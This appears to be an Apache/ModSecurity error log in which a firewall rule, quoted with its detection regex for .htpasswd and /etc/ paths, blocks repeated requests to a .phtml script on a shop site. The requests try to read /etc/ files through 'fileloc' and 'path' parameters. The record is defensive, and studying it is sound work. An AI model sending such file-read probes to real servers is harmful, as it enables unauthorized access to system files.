[Thu Mar 19 18:56:38.251228 2026] [:error] [pid 20435:tid 140411624429312] [client 57.141.18.34:54374] [client 57.141.18.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxFpJaM1-0uhhUQJND8wAAAI4"]
[Thu Mar 19 18:56:38.810867 2026] [:error] [pid 7893:tid 140411607643904] [client 57.141.18.5:54384] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/asound.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxFhCii7xarUs8iHYWUQAAAhA"]
[Thu Mar 19 18:56:38.861244 2026] [:error] [pid 7893:tid 140411557287680] [client 57.141.18.19:54388] [client 57.141.18.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxFhCii7xarUs8iHYWUgAAAhY"]
[Thu Mar 19 18:56:39.872541 2026] [:error] [pid 19655:tid 140411582465792] [client 57.141.18.15:54410] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxF01ujooLWdUDGy7_-AAAAFM"]
[Thu Mar 19 18:56:40.423942 2026] [:error] [pid 7893:tid 140411557287680] [client 57.141.18.97:54428] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/statetab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxGBCii7xarUs8iHYWUwAAAhY"]
[Thu Mar 19 18:56:40.475538 2026] [:error] [pid 7235:tid 140411683178240] [client 57.141.18.31:54432] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxGPqxLDW4GITHUkSTHwAAAQc"]
[Thu Mar 19 18:56:41.034520 2026] [:error] [pid 17887:tid 140411540502272] [client 57.141.18.21:54406] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxGQkwaGbbGflqUZD2pAAAANg"]
[Thu Mar 19 18:56:41.442333 2026] [:error] [pid 17887:tid 140411540502272] [client 57.141.18.105:54442] [client 57.141.18.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxGQkwaGbbGflqUZD2pQAAANg"]
[Thu Mar 19 18:56:42.045821 2026] [:error] [pid 26799:tid 140411683178240] [client 57.141.18.82:54460] [client 57.141.18.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxGta6ubjKNq_cu4Z_9AAAA0c"]
[Thu Mar 19 18:56:42.396613 2026] [:error] [pid 21219:tid 140411725141760] [client 57.141.18.43:54474] [client 57.141.18.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dbus-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxGvXLqtnMIWvjpaJJkgAAAoI"]
[Thu Mar 19 18:56:43.449427 2026] [:error] [pid 7893:tid 140411565680384] [client 57.141.18.108:54500] [client 57.141.18.108] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxGxCii7xarUs8iHYWWQAAAhU"]
[Thu Mar 19 18:56:43.473629 2026] [:error] [pid 7893:tid 140411607643904] [client 57.141.18.93:54502] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxGxCii7xarUs8iHYWWgAAAhA"]
[Thu Mar 19 18:56:43.787309 2026] [:error] [pid 7893:tid 140411557287680] [client 57.141.18.82:54506] [client 57.141.18.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxGxCii7xarUs8iHYWWwAAAhY"]
[Thu Mar 19 18:56:44.387857 2026] [:error] [pid 5816:tid 140411548894976] [client 57.141.18.53:54520] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxHJfmNfuxceSuAEK_1QAAAdc"]
[Thu Mar 19 18:56:44.555399 2026] [:error] [pid 5816:tid 140411548894976] [client 57.141.18.90:54522] [client 57.141.18.90] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxHJfmNfuxceSuAEK_1gAAAdc"]
[Thu Mar 19 18:56:44.755778 2026] [:error] [pid 17887:tid 140411540502272] [client 57.141.18.70:54526] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.updated"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxHAkwaGbbGflqUZD2pgAAANg"]
[Thu Mar 19 18:56:45.269600 2026] [:error] [pid 30077:tid 140411599251200] [client 57.141.18.20:54536] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxHfu8EFLIOrSqIpvTaAAAAlE"]
[Thu Mar 19 18:56:45.618763 2026] [:error] [pid 14269:tid 140411548894976] [client 57.141.18.115:54540] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/odbcinst.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxHQbLMZ6AikZjR9WG3QAAABc"]
[Thu Mar 19 18:56:45.837515 2026] [:error] [pid 7545:tid 140411741927168] [client 57.141.18.37:54542] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxHX8B84UptSoTJtY52QAAAYA"]
[Thu Mar 19 18:56:46.778502 2026] [:error] [pid 17653:tid 140411674785536] [client 57.141.18.50:54572] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release-cpe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxHsdf6f5d65gmYZSkyAAAAsg"]
[Thu Mar 19 18:56:47.397375 2026] [:error] [pid 21219:tid 140411708356352] [client 57.141.18.53:54584] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxH_XLqtnMIWvjpaJJlAAAAoQ"]
[Thu Mar 19 18:56:47.798831 2026] [:error] [pid 26799:tid 140411716749056] [client 57.141.18.55:54588] [client 57.141.18.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxH9a6ubjKNq_cu4Z_9gAAA0M"]
[Thu Mar 19 18:56:48.558774 2026] [:error] [pid 17887:tid 140411733534464] [client 57.141.18.65:54612] [client 57.141.18.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/kdump.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxIAkwaGbbGflqUZD2pwAAAME"]
[Thu Mar 19 18:56:48.780017 2026] [:error] [pid 21219:tid 140411674785536] [client 57.141.18.81:54618] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxIPXLqtnMIWvjpaJJlQAAAog"]
[Thu Mar 19 18:56:49.715018 2026] [:error] [pid 26799:tid 140411641214720] [client 57.141.18.58:54630] [client 57.141.18.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxIda6ubjKNq_cu4Z_9wAAA0w"]
[Thu Mar 19 18:56:49.800911 2026] [:error] [pid 8307:tid 140411607643904] [client 57.141.18.23:54634] [client 57.141.18.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mime.types"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxIb-FhjpZGs9ba8qV-gAAAxA"]
[Thu Mar 19 18:56:50.010478 2026] [:error] [pid 19655:tid 140411582465792] [client 57.141.18.39:54640] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/services"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxIk1ujooLWdUDGy7__AAAAFM"]
[Thu Mar 19 18:56:50.117495 2026] [:error] [pid 17887:tid 140411733534464] [client 57.141.18.20:54642] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxIgkwaGbbGflqUZD2qAAAAME"]
[Thu Mar 19 18:56:50.706282 2026] [:error] [pid 14269:tid 140411674785536] [client 57.141.18.81:54648] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri 